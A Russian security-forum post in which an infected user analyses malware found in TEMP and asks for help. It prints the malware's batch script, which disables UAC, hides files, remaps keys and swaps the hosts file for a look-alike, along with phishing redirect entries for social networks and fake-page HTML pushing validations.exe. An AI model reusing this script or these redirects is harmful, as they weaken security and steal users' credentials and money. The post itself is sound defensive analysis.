-
Junior Member
- Вес репутации
- 45
Кража паролей, подозрительные файлы в /temp
Обнаружил у себя в общей свалке /TEMP небольшой зверинец.
Для начала посмотрел msconfig. В автозагрузке обнаружилась фейковая строка "Операционная система Microsoft Windows", вызывающая cmd.exe и отправляющая в него команды.
По командам видно, что запускается bat скрипт и выполняются некоторые манипуляции с файлом hosts.
Тело bat скрипта:
Код:
Reg Add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V Hidden /T REG_DWORD /D 0 /F
::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f
erase "C:\Users\EXL\AppData\Local\Temp.810868802526864467f76.exe"
::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
erase /Q "C:\Users\EXL\AppData\Local\Temp\znddv.vbs"
chcp 1251
copy "C:\Users\EXL\AppData\Local\Temp\p83j9" "C:\WINDOWS\system32\drivers\etc\hоsts" /Y
Из которого видно, что для начала отключается показ скрытых файлов, потом выполнение скриптов LUA???, затем скорее всего реестр патчится кейлогером/кейсканером. После этого стирается какой-то экзешник и VBS скрипт znddv.vbs. Потом меняется кодировка, и в файл drivers\etc записывается фейковый файл hоsts с написанием имени через русскую (кириллическую) букву "о".
Т.е получается на деле вот что:
Настоящий hosts переименовывается и скрывается, а на его место ставится фейковый, объёмом в 273 кб. Тело этого инфицированного файла тоже интересно. Хакер пытается сбить юзера с толку наставив в нём лишних пробелов и сдвинув коварные строчки далеко за поле зрения.
В инфицированном hosts - имеются следующие записи:
Код:
95.156.222.12 odnoklassniki.ru
95.156.222.12 www.facebook.com
95.156.222.12 www.twitter.com
95.156.222.12 vkontakte.ru
95.156.222.12 ru-ru.facebook.com
95.156.222.12 www.odnoklassniki.ru
95.156.222.12 vk.com
95.156.222.12 www.vkontakte.ru
95.156.222.12 www.vk.com
95.156.222.12 facebook.com
95.156.222.12 twitter.com
Если просто перейти по IP-адресу получаем отлуп 400 Bad Request.
При заходе на данный IP адрес сервером распознаются какие-то команды и выдаётся фейковая страничка, точь в точь похожая на оригинальную официального ресурса.
Вводя пароль и логин на данных фейковых сайтах вы отправляете их злоумышленикам.
Кроме того хакерами была придумана интересная схема получения средств с незадачливых пользователей. Например рассмотрим фейковую форму ресурса 95.156.222.12 twitter.com.
После ввода ваших данных (логин/пароль) вылазит окошко с информацией следующего вида:
Номер Вашего телефона нужен для того, чтобы мы смогли прислать Вам код подтверждения и убедиться в том, что Вы - реальная личность!
"Twitter" гарантируют, что информация о Вашем номере ни при каких обстоятельствах не будет разглашена или передана третьим лицам. Данная мера принята для того, чтобы оградить пользователей от автоматических спам-ботов.
Имея доступ к указанному номеру, Вы всегда сможете восстановить пароль к Вашей странице.
Услуга недоступна абонентам некоторым регионам Мегафона.
После ввода телефонного номера появляется
На Ваш номер +79XXXXXXXXX был отправлен запрос валидации. В ответном СМС отправьте Ваш уникальный код: 13927
А на телефон приходит смс-ка такого содержания:
Естественно неопытные пользователи легко попадаются.
Я немного посмотрел код исходной страницы
Код:
Имея доступ к указанному номеру, Вы всегда сможете <b>восстановить пароль</b> к Вашей странице.
<br /><br />Услуга недоступна абонентам некоторым регионам Мегафона.
</div>
<div id="poup_progress">
<div class="poup_progress_bar">
<p id="t"></p>
</div>
</div>
<div id="popup_info_2">
Ваша заявка принята!
</div>
<div id="popup_info_3">
</div>
<div id="popup_info_4">
Валидация успешно завершена!<br />
Для вступления изменений в силу <a href="/validations.exe">скачайте и запустите этот файл</a>.
</div>
</div>
</div>
</div>
<div class="box_controls_wrap">
<div class="box_controls">
после отправки СМС-ки пользователю советует запустить некий validations.exe, размером 11 кбайт. Мне стало немного интересно и я запустил данный файл в виртуальной машине, хотя антивирус ругался что он закриптован. При запуске вылезло:
Валидация прошла успешно, перезагрузите компьютер
. После перезагрузки файл validations.exe удалился, а hosts очистился от коварных строк и стал весить 0byte.
Результат сканирования исполнительного файла из архива:
https://www.virustotal.com/file/9360fa85e42...sis/1329627824/
В общем у меня вопросы к комьюнити.
Снифятся ли пароли или буфер обмена этим зверинцем? Что именно делает строка
Код:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f
и за что отвечают строки вида
Код:
::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
в bat скрипте?
Как именно попадают такие вирусы в компьютер? Через javascript в браузерах?
Я грохнул все исполнительные файлы вируса и подозрительные ветки реестра, но до сих пор не уверен в своей защите. Что вы можете мне посоветовать?
Спасибо за внимание.
Последний раз редактировалось olejah; 19.02.2012 в 12:30.
Причина: правила форума, п. 11
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Сообщение от
RZS
Я грохнул все исполнительные файлы вируса и подозрительные ветки реестра, но до сих пор не уверен в своей защите. Что вы можете мне посоветовать?
Провериться у нас.
-